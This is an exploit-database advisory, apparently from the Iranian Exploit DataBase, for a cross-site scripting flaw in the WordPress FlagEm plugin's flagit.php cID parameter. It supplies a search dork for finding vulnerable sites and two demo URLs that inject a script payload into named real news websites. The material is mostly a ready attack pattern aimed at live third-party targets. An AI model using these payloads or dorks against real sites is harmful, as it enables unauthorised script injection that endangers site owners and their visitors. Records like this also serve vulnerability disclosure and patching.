The WordPress FlagEm plugin suffers from a cross site scripting vulnerability.
b2aff13a721933615831574d3a200e0aa8d91b95d990db54195e7205f361aeb2
#################################
# Iranian Exploit DataBase
# http://iedb.ir
#################################
# Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : IeDb.Team@Gmail.com
# Home : http://iedb.ir
# Software Link : http://wordpress.org/
# Security Risk : High
# Tested on : Linux
# Dork : inurl:/plugins/FlagEm/
#################################
# Exploit :
# [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]
# Dem0 :
# http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>
# http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>
#################################
# Exploit Archive = http://www.iedb.ir/exploits-269.html
#################################